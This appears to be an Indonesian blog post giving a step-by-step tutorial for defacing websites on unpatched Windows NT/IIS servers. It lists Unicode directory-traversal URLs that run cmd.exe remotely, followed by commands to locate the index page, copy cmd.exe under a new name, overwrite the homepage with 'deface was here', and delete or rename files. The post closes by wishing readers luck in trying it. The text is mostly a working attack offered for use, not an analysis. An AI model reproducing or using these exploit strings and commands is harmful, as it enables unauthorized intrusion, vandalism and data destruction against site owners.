tapi aq cuman mau bagi2 sedikit informasi yang aq tau...
semoga berguna...
hehehehehehehehehe...
______________________________________________________________
Langkah 1 : Mencari target
Mencari target dapat dilakukan dengan berbagai cara hal ini tergantung kreativitas dan sarana yang dimiliki, dalam hal ini bisa berbentuk script IRC, scanner. Sebagai dasar mengetahui OS yang digunakan server suatu site dapat diketahui dengan mencarinya pada situs http://www.netcraft.com/
Langkah 2 : Unicode
Setelah target didapat maka digunakan Unicode. Unicode itu sendiri aq juga ngga terlalu tau secara detail, tapi pada dasarnya Unicode menggunakan bahasa ASCII. Server yang pake OS NT dengan IIS sendiri punya bug yang bisa ditembus dengan Unicode dalam hal ini bila server itu belum dipatch. Unicode yang berhasil ditemukan untuk memasuki server NT sudah banyak.
Dan yang bisa dicoba sebagai berikut:
http://target/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Bila Unicode tersebut berhasil maka akan dapat dilihat tampilan kaya gini:
Directory of c:\06/03/01 09:59a (DIR) InetPub08/08/01 06:14p (DIR) WINNT
Langkah 3 :cari halaman depan
Saat membuka situs tersebut pada browser, kita pasti akan melihat tampilan muka dari site tersebut, perlu diperhatikan adalah file tampilan muka tersebut apa? biasanya antara lain: index.htm, index.html, default.htm, default.html.
Kemudian dengan mengunakan Unicode tersebut kita mencari file tersebut letaknya dimana, biasanya di C:\inetpub\wwwroot (hal ini belum tentu). untuk mencari file tersebut dapat digunakan perintah:/c+dir/s+c:\index.htm
Hal ini berarti perintah mencari file index.htm di dalam drive CUntuk melihat apakah file index.htm tersebut adalah yang digunakan pada halaman depan, dipergunakan perintah :/c+type+c:\direktory dan nama file, contoh : /c+type+c:\inetpub\wwwroot\index.htm
Setelah lu menemukan file index.htm tersebut, maka sebaiknya lu copy dulu, hal ini agar tindakan Deface kita tidak terlalu merugikan Administrator dari server situs tersebut. Sehingga nantinya Admin tersebut mempunyai backup dari file index.
perintah copy itu sendiri adalah:/c+copy+c:\
contoh untuk pencopyan adalah:/c+copy+c:\inetpub\wwwroot\index.htm backupindex.html
untuk mempermudah pekerjaan dapat dilakukan pencopyan file cmd.exe yg berada di direktory c:/winnt/system32 dengan menggunakan nama lu,
seperti :/c+copy+c:\winnt\system32\cmd.exe+c:\deface.exe hal ini berarti lu mencopy file cmd.exe ke dir c dgn nama deface.exe, jadi untuk perintah2 selanjutnya tidak memerlukan /winnt/system32/cmd.exe?/ tapi cukup /deface.exe?/
Langkah 4 : Meng-Copy file index.htm
echo dalam dos berarti anda membuat file maka bila file index.htm yg asli lu echo berarti lu timpa dengan file index lu.
Untuk perintahnya adalah:/deface.exe?/c+echo+"deface+was+here"+>+c:\inetpub\wwwroot\index.htm
jadi tampilan site depan telah terganti dengan tulisan deface was here
Catatan:Hal ini berlaku bila file index.htm tersebut dapat diecho, karena sebagian server membatasi direktory root dengan atribut read only, sehingga perintah echo index.htm akan menghasilkan :Access Denied
Untuk membuat deface lu jadi lebih bagus, dapat digunakan bahasa HTML dan ASCII
perintah-perintah lain :
membuat direktory = /c+mkdir+c:\
merubah nama file = /c+ren+c:\file
menghapus file = /c+del+c:\file
menghapus file Read-Only = /c+del+/R+c:\file
selamat mencoba...
heheheheheheheheheheheheheheheeee...
Tidak ada komentar:
Posting Komentar